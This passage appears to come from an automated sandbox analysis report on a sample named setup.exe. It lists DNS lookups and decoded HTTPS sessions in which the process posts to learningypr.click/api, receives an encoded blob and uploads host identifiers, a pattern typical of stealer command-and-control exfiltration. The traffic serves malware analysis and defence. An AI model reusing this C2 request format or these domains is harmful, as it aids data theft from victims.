                                                                                                                                                                                                                                Dec 30, 2024 19:10:30.218369007 CET1.1.1.1192.168.2.40xf942No error (0)klipvumisui.shop104.21.37.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 30, 2024 19:10:30.827205896 CET1.1.1.1192.168.2.40x6973Name error (3)dfgh.onlinenonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                • learningypr.click
                                                                                                                                                                                                                                • cegu.shop
                                                                                                                                                                                                                                • klipvumisui.shop

                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                0192.168.2.449730104.21.32.14437252C:\Users\user\Desktop\setup.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-30 18:10:12 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                Host: learningypr.click
                                                                                                                                                                                                                                2024-12-30 18:10:12 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                                                2024-12-30 18:10:12 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:12 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=h2lp9ki53gvd9t6oikc5vdim32; expires=Fri, 25 Apr 2025 11:56:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YwikyTY3usRt8thjb68%2BieawodxWOI0aWqwCRypTkV157cRlVXo3PuMmMhmwc6g5cws6nvPN5yn70GjfKxxDqH2iJXTMrapCVHGM7sTrsl7jeFshdB955Owa%2FsTegLDxsq2e%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fc3bcfb58cda-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1831&min_rtt=1817&rtt_var=709&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=908&delivery_rate=1512953&cwnd=242&unsent_bytes=0&cid=357708305d3648be&ts=503&x=0"
                                                                                                                                                                                                                                2024-12-30 18:10:12 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                Data Ascii: 2ok
                                                                                                                                                                                                                                2024-12-30 18:10:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                1192.168.2.449731104.21.32.14437252C:\Users\user\Desktop\setup.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-30 18:10:13 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 78
                                                                                                                                                                                                                                Host: learningypr.click
                                                                                                                                                                                                                                2024-12-30 18:10:13 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
                                                                                                                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--DRON&j=637b55279021aab33278188cfa638397
                                                                                                                                                                                                                                2024-12-30 18:10:13 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:13 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=ejm978dbr9468tmcg9uticf47v; expires=Fri, 25 Apr 2025 11:56:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F%2BoBz6518y43Ud1q0d6COkHR2UOE6dXrfo4gtydCBcUxmk%2FnCGNJyel1g64USOCbjLINcbf9L527StBaA9pjPIwKC4X8WI099KSvz4q%2FO5IpAx9F0WS0liPeenMo0aOhTi5YHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fc418ddb41a6-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1633&rtt_var=618&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=979&delivery_rate=1761158&cwnd=239&unsent_bytes=0&cid=66a2567a93f3130d&ts=478&x=0"
                                                                                                                                                                                                                                2024-12-30 18:10:13 UTC240INData Raw: 34 66 34 34 0d 0a 30 57 75 46 2f 56 62 32 47 66 54 70 31 2f 57 2b 37 43 79 61 78 69 6b 6d 78 4e 42 67 4e 39 35 2b 6f 53 6e 66 4c 6a 33 46 47 6e 79 71 53 66 50 66 62 4d 49 31 31 70 71 79 31 34 53 59 58 75 2b 6a 42 51 53 6c 74 45 49 4e 75 42 2f 4e 57 72 6f 43 48 37 4e 33 58 75 73 4e 35 4a 45 6c 6b 7a 58 57 6a 4b 2f 58 68 4c 64 58 75 4b 4e 48 42 50 37 79 42 56 32 38 48 38 31 4c 76 6b 56 53 74 58 59 66 75 51 66 69 6c 54 4f 56 66 5a 57 46 75 70 44 62 69 55 33 77 71 45 42 4c 72 4c 31 43 47 2f 77 62 32 77 76 6c 44 48 43 67 62 68 32 63 43 76 61 57 64 49 73 31 6a 38 75 79 6d 35 7a 57 44 76 75 6a 53 30 71 69 74 41 74 66 74 68 62 46 53 72 74 45 54 61 78 38 46 4c 6b 4a 34 5a 51 35 6e 47 6d 59 6a 37 32 62 33 59 4e 4e 75 4f
                                                                                                                                                                                                                                Data Ascii: 4f440WuF/Vb2GfTp1/W+7CyaxikmxNBgN95+oSnfLj3FGnyqSfPfbMI11pqy14SYXu+jBQSltEINuB/NWroCH7N3XusN5JElkzXWjK/XhLdXuKNHBP7yBV28H81LvkVStXYfuQfilTOVfZWFupDbiU3wqEBLrL1CG/wb2wvlDHCgbh2cCvaWdIs1j8uym5zWDvujS0qitAtfthbFSrtETax8FLkJ4ZQ5nGmYj72b3YNNuO
                                                                                                                                                                                                                                2024-12-30 18:10:13 UTC1369INData Raw: 6f 4c 51 37 37 79 57 68 58 76 4c 73 42 61 72 46 6c 53 74 33 35 65 72 45 66 2b 33 7a 4f 59 4f 38 37 4c 76 5a 76 53 69 30 33 33 6f 30 70 45 74 4c 30 43 56 72 51 55 78 30 47 79 51 31 43 70 63 68 6d 37 41 4f 43 51 4d 35 78 39 6d 59 6a 31 32 5a 79 4a 56 72 6a 38 43 32 53 32 73 51 46 42 73 51 32 44 56 50 4e 56 48 36 42 30 58 75 74 4a 34 5a 45 31 6d 58 75 45 67 37 36 63 32 5a 78 46 38 61 6c 47 52 4b 75 34 44 56 61 38 47 38 6c 42 73 6b 5a 62 71 6e 55 59 73 77 6d 6e 30 58 53 54 59 39 62 54 39 62 54 5a 6e 6b 6e 30 73 67 6c 2b 35 71 31 4d 54 50 77 62 7a 77 76 6c 44 46 65 69 65 78 32 34 42 75 53 58 50 34 5a 37 68 49 32 34 6b 73 36 49 53 2f 61 75 53 46 61 73 76 41 52 57 74 52 66 4b 54 72 70 49 48 2b 6b 34 47 61 74 4a 76 39 38 56 6d 58 43 61 67 61 4b 58 6e 4a 45 41 34
                                                                                                                                                                                                                                Data Ascii: oLQ77yWhXvLsBarFlSt35erEf+3zOYO87LvZvSi033o0pEtL0CVrQUx0GyQ1Cpchm7AOCQM5x9mYj12ZyJVrj8C2S2sQFBsQ2DVPNVH6B0XutJ4ZE1mXuEg76c2ZxF8alGRKu4DVa8G8lBskZbqnUYswmn0XSTY9bT9bTZnkn0sgl+5q1MTPwbzwvlDFeiex24BuSXP4Z7hI24ks6IS/auSFasvARWtRfKTrpIH+k4GatJv98VmXCagaKXnJEA4
                                                                                                                                                                                                                                2024-12-30 18:10:13 UTC1369INData Raw: 71 75 41 52 61 73 52 43 44 42 66 31 4c 52 2b 63 67 58 70 6b 4b 38 35 77 2b 31 6b 36 56 68 62 75 51 79 73 35 52 74 72 30 4c 51 36 72 79 57 68 57 78 48 63 74 4e 72 30 4e 53 70 48 59 51 76 41 7a 6f 6c 7a 53 55 64 70 4f 50 76 70 7a 66 67 30 72 71 72 6b 74 4d 6f 37 4d 49 58 2f 78 53 67 30 79 6c 44 41 66 6e 53 51 6d 34 53 39 4b 63 4f 70 70 38 67 4d 75 71 32 63 58 4f 53 66 54 6b 45 77 53 72 75 67 64 51 73 78 33 4a 52 62 68 47 55 36 39 32 48 61 45 47 34 35 38 34 6e 48 47 62 68 62 47 66 31 59 56 46 2f 71 52 4b 54 75 62 38 51 6c 4b 6b 58 4a 73 4c 69 55 74 54 71 6e 64 63 68 67 72 70 6b 54 4f 43 4f 34 6e 46 72 4e 66 62 67 67 36 67 35 45 64 4e 70 72 6b 49 55 62 77 62 7a 6b 36 2b 53 31 79 71 66 78 53 39 44 75 4f 54 50 5a 6c 39 6c 6f 79 78 6b 73 36 4c 52 2f 53 6f 43 77
                                                                                                                                                                                                                                Data Ascii: quARasRCDBf1LR+cgXpkK85w+1k6VhbuQys5Rtr0LQ6ryWhWxHctNr0NSpHYQvAzolzSUdpOPvpzfg0rqrktMo7MIX/xSg0ylDAfnSQm4S9KcOpp8gMuq2cXOSfTkEwSrugdQsx3JRbhGU692HaEG4584nHGbhbGf1YVF/qRKTub8QlKkXJsLiUtTqndchgrpkTOCO4nFrNfbgg6g5EdNprkIUbwbzk6+S1yqfxS9DuOTPZl9loyxks6LR/SoCw
                                                                                                                                                                                                                                2024-12-30 18:10:13 UTC1369INData Raw: 53 76 49 46 67 30 79 78 44 41 66 6e 63 52 65 68 42 2b 6d 57 4f 5a 4a 7a 6b 59 57 34 6e 4e 71 46 53 66 2b 69 52 6b 79 72 74 77 46 55 75 42 62 52 53 4c 5a 47 55 71 30 34 55 50 4d 4f 2f 39 39 73 31 46 79 61 6f 71 57 4d 7a 70 67 4f 35 2b 70 53 42 4b 47 2b 51 67 33 38 48 38 78 43 73 6b 52 58 71 48 63 61 76 51 2f 68 6b 6a 47 62 63 59 53 44 75 35 72 58 67 55 58 71 70 45 5a 41 71 72 59 4b 58 72 5a 63 6a 51 75 36 56 42 2f 2f 4f 43 75 2b 42 75 65 63 49 74 52 6b 32 4a 4c 31 6b 4e 44 4f 46 72 69 6f 52 55 53 70 76 67 35 65 74 42 33 50 52 62 70 4a 56 71 39 77 44 4c 49 4e 37 35 34 36 6d 33 71 53 6a 72 43 54 32 34 70 49 39 2b 51 46 42 4b 47 71 51 67 33 38 4d 2b 52 2b 2f 32 31 6c 35 32 64 51 71 6b 6e 67 6b 33 54 4d 4f 35 71 49 75 5a 2f 54 69 45 66 30 72 6b 4a 50 71 72 6b
                                                                                                                                                                                                                                Data Ascii: SvIFg0yxDAfncRehB+mWOZJzkYW4nNqFSf+iRkyrtwFUuBbRSLZGUq04UPMO/99s1FyaoqWMzpgO5+pSBKG+Qg38H8xCskRXqHcavQ/hkjGbcYSDu5rXgUXqpEZAqrYKXrZcjQu6VB//OCu+BuecItRk2JL1kNDOFrioRUSpvg5etB3PRbpJVq9wDLIN7546m3qSjrCT24pI9+QFBKGqQg38M+R+/21l52dQqkngk3TMO5qIuZ/TiEf0rkJPqrk
                                                                                                                                                                                                                                2024-12-30 18:10:13 UTC1369INData Raw: 4d 5a 45 76 45 31 5a 74 58 38 58 6f 51 66 71 6b 44 79 63 63 70 65 50 73 4a 72 61 67 6b 54 35 6f 30 56 4b 72 76 4a 4d 46 62 73 45 67 78 50 39 62 55 2b 38 61 67 69 2b 4b 4f 71 51 64 49 73 31 6a 38 75 79 6d 35 7a 57 44 76 47 32 54 30 6d 30 75 77 56 62 73 78 2f 52 53 72 42 48 54 61 42 33 47 72 51 46 34 5a 41 79 6c 58 36 63 68 37 4b 53 31 34 46 43 75 4f 6f 4c 51 37 37 79 57 68 57 53 46 39 42 63 76 6b 4a 55 73 57 4e 65 72 45 66 2b 33 7a 4f 59 4f 38 37 4c 74 70 7a 58 69 6b 37 30 70 45 39 4a 70 71 41 4e 55 72 73 56 79 46 6d 33 53 31 69 73 63 42 57 38 44 2f 57 54 4f 6f 5a 2b 68 4a 6e 31 32 5a 79 4a 56 72 6a 38 43 33 4b 68 6f 68 4a 57 2f 69 33 56 53 4b 74 48 55 71 73 34 41 66 30 51 70 35 67 34 31 43 50 57 6a 62 71 65 33 34 46 50 38 61 68 47 51 61 2b 33 41 31 4f 34
                                                                                                                                                                                                                                Data Ascii: MZEvE1ZtX8XoQfqkDyccpePsJragkT5o0VKrvJMFbsEgxP9bU+8agi+KOqQdIs1j8uym5zWDvG2T0m0uwVbsx/RSrBHTaB3GrQF4ZAylX6ch7KS14FCuOoLQ77yWhWSF9BcvkJUsWNerEf+3zOYO87LtpzXik70pE9JpqANUrsVyFm3S1iscBW8D/WTOoZ+hJn12ZyJVrj8C3KhohJW/i3VSKtHUqs4Af0Qp5g41CPWjbqe34FP8ahGQa+3A1O4
                                                                                                                                                                                                                                2024-12-30 18:10:13 UTC1369INData Raw: 35 58 48 37 67 32 42 2f 4d 4f 36 39 39 73 31 48 69 52 69 4c 53 64 31 59 4a 42 2f 36 42 5a 54 71 47 67 41 31 53 33 45 63 39 4c 73 45 46 56 70 6e 45 54 76 77 54 67 6d 44 75 52 4f 39 6a 4c 73 6f 2b 63 31 67 37 5a 71 55 42 49 2f 65 68 43 53 76 49 46 67 30 79 78 44 41 66 6e 65 42 53 32 41 2b 71 63 4f 35 64 70 6c 34 32 6e 6c 39 47 45 58 50 4b 76 54 6b 6d 72 76 77 46 54 75 68 66 50 57 62 52 4d 58 4b 77 34 55 50 4d 4f 2f 39 39 73 31 46 69 42 6e 62 2b 51 30 4a 68 46 2b 61 64 64 53 62 62 79 54 42 57 74 47 39 49 4c 35 56 70 50 73 48 38 42 2f 52 43 6e 6d 44 6a 55 49 39 61 4e 76 4a 48 62 69 45 44 71 6f 55 31 4c 71 62 73 4c 55 62 51 66 77 30 2b 35 53 31 71 6b 64 42 57 30 43 75 69 62 50 5a 70 79 6d 63 76 37 31 39 75 57 44 71 44 6b 61 6c 2b 6c 76 67 38 56 6f 31 4c 61 43
                                                                                                                                                                                                                                Data Ascii: 5XH7g2B/MO699s1HiRiLSd1YJB/6BZTqGgA1S3Ec9LsEFVpnETvwTgmDuRO9jLso+c1g7ZqUBI/ehCSvIFg0yxDAfneBS2A+qcO5dpl42nl9GEXPKvTkmrvwFTuhfPWbRMXKw4UPMO/99s1FiBnb+Q0JhF+addSbbyTBWtG9IL5VpPsH8B/RCnmDjUI9aNvJHbiEDqoU1LqbsLUbQfw0+5S1qkdBW0CuibPZpymcv719uWDqDkal+lvg8Vo1LaC
                                                                                                                                                                                                                                2024-12-30 18:10:13 UTC1369INData Raw: 67 59 46 37 72 53 63 65 55 49 70 46 38 67 4d 6d 41 6c 4e 4b 41 53 65 37 6b 56 48 76 6f 38 67 4d 56 35 43 58 61 43 36 73 4d 42 2f 55 32 58 71 46 4a 76 39 39 7a 6c 32 6d 45 6a 62 61 42 33 38 6c 77 78 6f 4e 64 54 71 47 69 42 55 4b 7a 58 49 30 4c 73 67 77 48 6e 6a 67 58 74 42 4c 32 69 54 6d 45 66 4e 61 30 2b 39 66 45 7a 68 61 34 6b 55 68 4b 71 4c 55 55 52 50 45 37 31 55 47 36 58 46 69 77 64 31 37 39 53 65 48 66 62 4d 63 31 31 6f 2b 6b 31 34 54 65 48 4b 50 78 47 42 50 32 34 42 30 62 70 56 7a 56 43 2b 55 65 45 65 64 71 58 75 74 4a 6f 4a 77 6d 68 6e 32 56 6e 62 62 51 34 72 42 70 34 71 6c 4e 55 37 65 4d 50 46 4b 6d 45 63 56 63 72 41 42 4b 70 48 59 51 74 42 2b 6e 30 58 53 62 4f 38 36 79 39 64 2b 63 73 51 43 34 76 41 73 63 35 6f 63 42 57 37 49 62 31 56 72 77 61 30
                                                                                                                                                                                                                                Data Ascii: gYF7rSceUIpF8gMmAlNKASe7kVHvo8gMV5CXaC6sMB/U2XqFJv99zl2mEjbaB38lwxoNdTqGiBUKzXI0LsgwHnjgXtBL2iTmEfNa0+9fEzha4kUhKqLUURPE71UG6XFiwd179SeHfbMc11o+k14TeHKPxGBP24B0bpVzVC+UeEedqXutJoJwmhn2VnbbQ4rBp4qlNU7eMPFKmEcVcrABKpHYQtB+n0XSbO86y9d+csQC4vAsc5ocBW7Ib1Vrwa0
                                                                                                                                                                                                                                2024-12-30 18:10:13 UTC1369INData Raw: 38 78 75 6e 78 33 54 54 65 49 53 5a 73 35 54 4b 6a 51 6e 47 6d 6d 78 4b 6f 62 4d 55 52 61 73 54 2f 58 57 6f 54 31 47 70 66 77 69 69 53 61 6e 66 4f 39 51 6a 72 38 76 39 31 2b 50 41 44 75 44 6b 45 77 53 54 73 51 78 62 75 77 72 53 42 70 70 43 57 4b 5a 75 44 71 51 47 70 39 46 30 6b 6a 76 4f 32 66 76 58 32 4a 38 4f 6f 50 51 5a 48 2f 50 68 56 51 58 75 41 34 31 53 2f 56 6f 66 2f 79 70 51 38 78 75 6e 78 33 54 54 65 49 53 5a 73 35 54 4b 6a 51 6e 47 6d 6d 78 4b 6f 62 4d 55 52 61 73 54 6a 47 57 4c 62 57 47 5a 62 52 32 39 42 2b 43 4a 4a 64 51 31 31 6f 54 31 7a 2b 58 4f 42 72 69 62 42 51 53 2b 38 6c 6f 56 69 52 2f 4e 52 62 70 61 54 75 70 66 45 4c 51 49 38 59 38 6a 6d 7a 53 34 76 5a 54 58 6b 73 35 49 75 50 77 5a 43 75 61 32 45 78 58 6b 54 4a 45 51 36 42 38 49 39 79 6f
                                                                                                                                                                                                                                Data Ascii: 8xunx3TTeISZs5TKjQnGmmxKobMURasT/XWoT1GpfwiiSanfO9Qjr8v91+PADuDkEwSTsQxbuwrSBppCWKZuDqQGp9F0kjvO2fvX2J8OoPQZH/PhVQXuA41S/Vof/ypQ8xunx3TTeISZs5TKjQnGmmxKobMURasTjGWLbWGZbR29B+CJJdQ11oT1z+XOBribBQS+8loViR/NRbpaTupfELQI8Y8jmzS4vZTXks5IuPwZCua2ExXkTJEQ6B8I9yo
                                                                                                                                                                                                                                2024-12-30 18:10:13 UTC1369INData Raw: 34 64 30 7a 44 75 37 6d 62 4b 48 33 38 34 41 75 4b 67 4c 48 4f 61 2f 45 46 4b 73 48 34 39 4d 70 30 73 66 75 44 59 48 38 78 2b 6e 78 32 66 61 4f 34 54 4c 37 64 65 62 67 45 50 35 70 30 56 48 74 4b 41 45 56 71 6f 66 68 48 57 44 59 55 32 67 61 42 33 78 4f 4f 71 62 49 6f 46 34 68 6f 79 4c 71 66 47 63 53 65 69 6e 43 57 69 68 76 77 35 72 67 69 76 53 54 4b 30 4f 65 61 52 75 48 66 4e 48 70 34 64 30 7a 44 75 37 6d 62 4b 48 33 38 78 69 2f 36 6c 48 42 4c 6e 38 47 78 57 71 58 4a 73 59 38 77 78 4e 35 79 42 65 39 41 72 31 6a 54 4b 58 62 5a 58 4d 69 36 6e 78 6e 45 6e 6f 70 77 6c 31 71 37 59 55 51 4c 38 4d 78 48 57 44 59 55 32 67 61 42 33 78 4c 4e 33 64 42 59 4a 34 6c 6f 57 79 31 35 4c 4f 56 72 6a 38 43 32 6d 30 74 52 4a 57 2f 6a 6e 35 43 59 78 61 58 4b 64 32 47 66 4e 48
                                                                                                                                                                                                                                Data Ascii: 4d0zDu7mbKH384AuKgLHOa/EFKsH49Mp0sfuDYH8x+nx2faO4TL7debgEP5p0VHtKAEVqofhHWDYU2gaB3xOOqbIoF4hoyLqfGcSeinCWihvw5rgivSTK0OeaRuHfNHp4d0zDu7mbKH38xi/6lHBLn8GxWqXJsY8wxN5yBe9Ar1jTKXbZXMi6nxnEnopwl1q7YUQL8MxHWDYU2gaB3xLN3dBYJ4loWy15LOVrj8C2m0tRJW/jn5CYxaXKd2GfNH


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                2192.168.2.449733104.21.32.14437252C:\Users\user\Desktop\setup.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-30 18:10:14 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=RVM1PD4RW0Q7YUQJ
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 18150
                                                                                                                                                                                                                                Host: learningypr.click
                                                                                                                                                                                                                                2024-12-30 18:10:14 UTC15331OUTData Raw: 2d 2d 52 56 4d 31 50 44 34 52 57 30 51 37 59 55 51 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 32 45 45 44 32 31 46 44 45 34 30 41 35 38 44 38 35 38 35 41 42 34 34 34 38 33 35 36 33 45 39 0d 0a 2d 2d 52 56 4d 31 50 44 34 52 57 30 51 37 59 55 51 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 56 4d 31 50 44 34 52 57 30 51 37 59 55 51 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d 0a 2d 2d 52 56 4d
                                                                                                                                                                                                                                Data Ascii: --RVM1PD4RW0Q7YUQJContent-Disposition: form-data; name="hwid"72EED21FDE40A58D8585AB44483563E9--RVM1PD4RW0Q7YUQJContent-Disposition: form-data; name="pid"2--RVM1PD4RW0Q7YUQJContent-Disposition: form-data; name="lid"hRjzG3--DRON--RVM
                                                                                                                                                                                                                                2024-12-30 18:10:14 UTC2819OUTData Raw: 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21
                                                                                                                                                                                                                                Data Ascii: h/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!
                                                                                                                                                                                                                                2024-12-30 18:10:15 UTC1143INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:15 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=35st2tp4822d2nnug0fqtgs755; expires=Fri, 25 Apr 2025 11:56:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h6vD68239u55TXc6tL7vg5B%2FT5IOe72fafCfOGTuTtAW%2Fa9sYCEgnW%2FW4%2BEDgRSd%2FWwYh7RH%2BSWNhVK8BcCkKdJ2blo%2F9hysYEkzKVt%2Bk2j%2BKQD5P2IDMMKIxbpaEqutCOXNdA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fc495c344344-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1684&min_rtt=1675&rtt_var=647&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2842&recv_bytes=19111&delivery_rate=1667618&cwnd=47&unsent_bytes=0&cid=026ba196026ca5c9&ts=659&x=0"
                                                                                                                                                                                                                                2024-12-30 18:10:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                2024-12-30 18:10:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                3192.168.2.449735104.21.32.14437252C:\Users\user\Desktop\setup.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-30 18:10:15 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=KKG02N6EU
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 8729
                                                                                                                                                                                                                                Host: learningypr.click
